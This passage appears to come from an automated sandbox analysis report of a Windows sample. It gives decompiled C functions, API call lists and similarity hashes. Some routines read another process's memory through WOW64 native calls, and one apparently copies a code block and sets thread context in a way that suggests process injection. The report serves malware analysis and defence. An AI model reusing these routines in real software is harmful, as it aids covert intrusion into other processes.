      				_t92 =  *_t127 + 0x10;
      				asm("adc ecx, ebx");
      				_t111 =  &(_a8[2]);
      				_v44 = _t92;
      				_v40 = _t114;
      				_v36 = _t124;
      				_v32 = _t128;
      				_v16 = 4;
      				if(_t124 != _t92 || _t128 != _t114) {
      					while(1) {
      						_t25 = _t125 + 0x68; // 0x68
      						_t94 = E00401EAA(_t114,  &_v36, _a4, _t25, 0x98);
      						_v8 = _t94;
      						if(_t94 == 0) {
      							goto L18;
      						}
      						_v16 = _v16 + 0x120;
      						_v36 =  *((intOrPtr*)(_t125 + 0x68));
      						_v32 =  *((intOrPtr*)(_t125 + 0x6c));
      						if(_v16 > _a12) {
      							L16:
      							if(_v36 != _v44 || _v32 != _v40) {
      								continue;
      							} else {
      								goto L18;
      							}
      						}
      						_t111[6] = _v12;
      						_t111[5] =  *(_t125 + 0xd0);
      						_t111[7] =  *((intOrPtr*)(_t125 + 0xd4));
      						_t111[4] =  *(_t125 + 0xa8);
      						_t102 = ( *(_t125 + 0xb0) & 0x0000ffff) >> 1;
      						_t111[2] =  *(_t125 + 0x98);
      						_t114 =  *(_t125 + 0x9c);
      						_v28 = _t102;
      						_t111[3] =  *(_t125 + 0x9c);
      						if(_t102 >= 0x100) {
      							L15:
      							_t111 =  &(_t111[0x48]);
      							_v12 = _v12 + 1;
      							goto L16;
      						}
      						_t53 = _t125 + 0xb8; // 0xb8
      						_t104 = E00401EAA(_t114, _t53, _a4, _v20,  *(_t125 + 0xb0) & 0x0000ffff);
      						_v8 = _t104;
      						if(_t104 == 0) {
      							goto L15;
      						}
      						_t131 = _v28;
      						_t105 = 0;
      						if(_t131 <= 0) {
      							L14:
      							_t62 =  &(_t111[8]); // 0x18
      							( &(_t111[8]))[_t131] = 0;
      							_t107 = StrRChrA(_t62, 0, 0x5c);
      							_t114 = 0xffe1 - _t111;
      							_t111[7] =  &(_t107[0xffe1]);
      							goto L15;
      						} else {
      							goto L13;
      						}
      						do {
      							L13:
      							 *((char*)(_t111 + _t105 + 0x20)) =  *((intOrPtr*)(_v20 + _t105 * 2));
      							_t105 = _t105 + 1;
      						} while (_t105 < _t131);
      						goto L14;
      					}
      					goto L18;
      				} else {
      					L18:
      					_t95 = _a8;
      					if(_t95 != 0) {
      						 *_t95 = _v12;
      					}
      					_t109 = _v16;
      					goto L21;
      				}
      			}



































      APIs
      • GetProcAddress.KERNEL32(ZwWow64QueryInformationProcess64,00000318,00000000,00000000), ref: 00401F1C
        • Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,004028D9,?,00000000,0000000C,?,?,?,?,00401091,?,?,736C6E70,767F1218,0000000C), ref: 00401052
      • StrRChrA.SHLWAPI(00000018,00000000,0000005C), ref: 004020A2
        • Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,00402908), ref: 00401067
        • Part of subcall function 00401EAA: GetProcAddress.KERNEL32(ZwWow64ReadVirtualMemory64,00000000,?,?,?,00401F79,00000000,00000000,00000028,00000100,00000200), ref: 00401ECC
      Strings
      • ZwWow64QueryInformationProcess64, xrefs: 00401F0F
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AddressHeapProc$AllocFree
      • String ID: ZwWow64QueryInformationProcess64
      • API String ID: 2873967426-1903490642
      • Opcode ID: 67615d1963f1d41362980ac05152757dfc87d522ce6721b7bf3f487be6093715
      • Instruction ID: 51d96d38a5a6676f4158eccec2c9cc356807936661d141839184c99d138b163b
      • Opcode Fuzzy Hash: 67615d1963f1d41362980ac05152757dfc87d522ce6721b7bf3f487be6093715
      • Instruction Fuzzy Hash: 35612E70A0030AABDB54DF55C984BAEBBB4FF08304F10446AEA54B73D1D778E950CBA5
      C-Code - Quality: 90%
      			E0040CD5B(CHAR* __edx) {
      				int _v8;
      				char* _v12;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				short* _t10;
      				signed int _t11;
      				char* _t12;
      				void* _t19;
      				CHAR* _t27;
      				short** _t29;
      
      				_t27 = __edx;
      				_push(_t20);
      				_t29 =  *0x4360a4; // 0x0
      				_v8 = 0;
      				_t10 =  *_t29;
      				if(_t10 == 0) {
      					L9:
      					_t11 = 0;
      					L10:
      					return _t11;
      				}
      				_t19 = WideCharToMultiByte;
      				while(1) {
      					_t12 = WideCharToMultiByte(0, 0, _t10, 0xffffffff, 0, 0, 0, 0);
      					_v12 = _t12;
      					if(_t12 == 0) {
      						break;
      					}
      					_t12 = E004110D9(_t12, 1);
      					_v8 = _t12;
      					if(_t12 == 0) {
      						break;
      					}
      					_t4 =  &_v12; // 0x402d4a
      					if(WideCharToMultiByte(0, 0,  *_t29, 0xffffffff, _t12,  *_t4, 0, 0) == 0) {
      						_push(_v8);
      						_t12 = E00410D1A(_t19, _t29, 0, __eflags);
      						break;
      					}
      					if(E00410E52(_t27,  &_v8, 0) < 0) {
      						_t39 = _v8;
      						if(_v8 != 0) {
      							_push(_v8);
      							E00410D1A(_t19, _t29, 0, _t39);
      							_v8 = 0;
      						}
      					}
      					_t29 =  &(_t29[1]);
      					_t10 =  *_t29;
      					if(_t10 != 0) {
      						continue;
      					} else {
      						goto L9;
      					}
      				}
      				_t11 = _t12 | 0xffffffff;
      				goto L10;
      			}















      APIs
      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00007FFF,01D31728,?,00000007,00000007,?,0040C52B,00007FFF), ref: 0040CD83
      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,J-@HrA,00000000,00000000,?,00000007,00000007,?,0040C52B,00007FFF,?,00000000), ref: 0040CDA9
        • Part of subcall function 00410E52: _strlen.LIBCMT ref: 00410FFC
        • Part of subcall function 00410E52: _strlen.LIBCMT ref: 00411014
        • Part of subcall function 00410E52: SetEnvironmentVariableA.KERNEL32(00000000,00402D4A,?,?,?,?,00000000,75F2170D,?,00418BD0,00000010,00402D4A,00417248), ref: 0041104E
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93
        • Part of subcall function 004110D9: Sleep.KERNEL32(00000000,0040FA78,00000001,00000214), ref: 004110FE
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ByteCharMultiWide_strlen$EnvironmentErrorFreeHeapLastSleepVariable
      • String ID: J-@HrA
      • API String ID: 2645788438-3743386923
      • Opcode ID: d05a747ac7e643321df18475da575f52cde5650be1e572d6000e7e74171ff0e8
      • Instruction ID: 862c2698da29ef155e7c377974f9c720012f7384bd46a8a65f25befde52213b1
      • Opcode Fuzzy Hash: d05a747ac7e643321df18475da575f52cde5650be1e572d6000e7e74171ff0e8
      • Instruction Fuzzy Hash: 21118271906125FADB209BA69C85DDF7FADDE057B4B30063BF014E21D0EA74AD40D6A8
      C-Code - Quality: 41%
      			E0040219B(void* __ecx, intOrPtr __edx, intOrPtr* __esi, void* __eflags, intOrPtr* _a4) {
      				intOrPtr _v984;
      				intOrPtr _v988;
      				signed int _v1112;
      				intOrPtr _v1116;
      				intOrPtr _v1188;
      				void _v1228;
      				int _v1232;
      				char _v1236;
      				char _v1240;
      				intOrPtr _v1248;
      				intOrPtr _v1252;
      				intOrPtr _v1256;
      				intOrPtr _v1260;
      				intOrPtr _t41;
      				char* _t42;
      				long _t50;
      				intOrPtr _t51;
      				intOrPtr* _t59;
      				void* _t61;
      				intOrPtr _t64;
      				intOrPtr* _t66;
      				intOrPtr* _t68;
      
      				_t68 = __esi;
      				_t64 = __edx;
      				_t61 = __ecx;
      				_t59 = _a4;
      				_v1236 = 0;
      				_v1232 = 0;
      				memset( &_v1228, 0, 0x4c8);
      				_t66 = E0040211A(_t64);
      				_t5 = _t68 + 0x218; // 0x218
      				_v1188 = 0x100003;
      				memcpy(_t5, E00402E4D, 0x100);
      				_t41 = E004027AD(_t61,  *_t59);
      				_v1260 = _t41;
      				if(_t41 != 0) {
      					_t42 =  &_v1236;
      					asm("cdq");
      					_push(_t64);
      					_push(_t42);
      					_v1252 = _t42;
      					_v1248 = _t64;
      					asm("cdq");
      					_push(_t64);
      					_push( *((intOrPtr*)(_t59 + 4)));
      					_push(0);
      					_push(2);
      					_push( *((intOrPtr*)(_t66 + 4)));
      					_push( *_t66);
      					if(E00402DE0() >= 0) {
      						_t14 = _t68 + 0x18; // 0x18
      						asm("cdq");
      						if( *((intOrPtr*)(__esi + 0x10)) == _t14 &&  *((intOrPtr*)(__esi + 0x14)) == _t64) {
      							asm("adc ecx, ecx");
      							 *((intOrPtr*)(__esi + 0x10)) = _v1256 + 0x18;
      							 *((intOrPtr*)(__esi + 0x14)) = 0;
      						}
      						 *_t68 = _v988;
      						 *((intOrPtr*)(_t68 + 4)) = _v984;
      						if(E0040276A( *_t59, _v1256, _t68,  &_v1240) == 0) {
      							goto L11;
      						} else {
      							_t51 = _v1256;
      							_push(_v1248);
      							_v1112 = _v1112 & 0x00000000;
      							_push(_v1252);
      							_v1116 = _t51;
      							asm("cdq");
      							_v988 = _t51 + 0x218;
      							_v984 = _t64;
      							asm("cdq");
      							_push(_t64);
      							_push( *((intOrPtr*)(_t59 + 4)));
      							_push(0);
      							_push(2);
      							_push( *((intOrPtr*)(_t66 + 0xc)));
      							_push( *((intOrPtr*)(_t66 + 8)));
      							if(E00402DE0() < 0) {
      								goto L3;
      							} else {
      								_t50 = 0;
      								goto L10;
      							}
      						}
      					} else {
      						L3:
      						_t50 = 5;
      					}
      				} else {
      					_t50 = GetLastError();
      					L10:
      					if(_t50 == 0xffffffff) {
      						L11:
      						_t50 = GetLastError();
      					}
      				}
      				return _t50;
      			}


























      APIs
      • memset.NTDLL ref: 004021C1
      • memcpy.NTDLL ref: 004021E9
        • Part of subcall function 004027AD: RtlNtStatusToDosError.NTDLL ref: 004027E5
        • Part of subcall function 004027AD: SetLastError.KERNEL32(00000000,?,?,?,00402336), ref: 004027EC
      • GetLastError.KERNEL32(00000010,00000218,00402E4D,00000100,?,00000318,00000008), ref: 00402200
        • Part of subcall function 0040276A: RtlNtStatusToDosError.NTDLL ref: 0040279A
        • Part of subcall function 0040276A: SetLastError.KERNEL32(00000000,?,00000318,00000008), ref: 004027A1
      • GetLastError.KERNEL32(00000010,?,00000000,?,?,?,?,?,?,?,?,00000010,00000218,00402E4D,00000100), ref: 004022DE
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Error$Last$Status$memcpymemset
      • String ID:
      • API String ID: 1551833903-0
      • Opcode ID: b3f4bb3f6c86a56d7e4b42c3487cbe3ce6be130a5c9ad4e3094e024aee6faca3
      • Instruction ID: d0833623cb9b424a463e9aacafeab85a9e0760c3cb7dcfda0f2a391c67fe8ec0
      • Opcode Fuzzy Hash: b3f4bb3f6c86a56d7e4b42c3487cbe3ce6be130a5c9ad4e3094e024aee6faca3
      • Instruction Fuzzy Hash: BB41BFB1504301AFD720DF65CE45B9BB7E8BB88314F00493EF598E22D0E7B4D9148B6A
      C-Code - Quality: 100%
      			E0040E568() {
      				intOrPtr _t8;
      				void* _t9;
      				void* _t11;
      				void* _t17;
      				signed int _t19;
      				intOrPtr* _t21;
      
      				_t8 =  *0x436bf4; // 0x0
      				_t19 =  *0x436be4; // 0x0
      				if(_t19 != _t8) {
      					L4:
      					_t21 =  *0x436be8 + _t19 * 0x14;
      					_t9 = HeapAlloc( *0x436214, 8, 0x41c4);
      					 *(_t21 + 0x10) = _t9;
      					if(_t9 == 0) {
      						L2:
      						return 0;
      					}
      					_t11 = VirtualAlloc(0, 0x100000, 0x2000, 4);
      					 *(_t21 + 0xc) = _t11;
      					if(_t11 != 0) {
      						 *(_t21 + 8) =  *(_t21 + 8) | 0xffffffff;
      						 *_t21 = 0;
      						 *((intOrPtr*)(_t21 + 4)) = 0;
      						 *0x436be4 =  *0x436be4 + 1;
      						 *( *(_t21 + 0x10)) =  *( *(_t21 + 0x10)) | 0xffffffff;
      						return _t21;
      					}
      					HeapFree( *0x436214, 0,  *(_t21 + 0x10));
      					goto L2;
      				}
      				_t17 = HeapReAlloc( *0x436214, 0,  *0x436be8, (_t8 + 0x10) * 0x14);
      				if(_t17 != 0) {
      					 *0x436bf4 =  *0x436bf4 + 0x10;
      					_t19 =  *0x436be4; // 0x0
      					 *0x436be8 = _t17;
      					goto L4;
      				}
      				goto L2;
      			}










      APIs
      • HeapReAlloc.KERNEL32(00000000,-00000010,00000001,00000000,0040EAC2,00000001,?,76ECE046,00000000,00000000,0040FA78,00000001,00000214), ref: 0040E58F
      • HeapAlloc.KERNEL32(00000008,000041C4,00000001,00000000,0040EAC2,00000001,?,76ECE046,00000000,00000000,0040FA78,00000001,00000214), ref: 0040E5C5
      • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0040E5DF
      • HeapFree.KERNEL32(00000000,?), ref: 0040E5F6
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AllocHeap$FreeVirtual
      • String ID:
      • API String ID: 3499195154-0
      • Opcode ID: e68206b2571ad2f33e4c0a726f1a4164fb77a1f21caaad09450859c6edacd99a
      • Instruction ID: a73b86c3c3e85fffb530331acd84b0771d661e4ca93faab2e0671b4a69d89a33
      • Opcode Fuzzy Hash: e68206b2571ad2f33e4c0a726f1a4164fb77a1f21caaad09450859c6edacd99a
      • Instruction Fuzzy Hash: C6119171548712BBC7218F65FD45956BBB5F7943207129D3AF2A2EB1F0D370A8108F68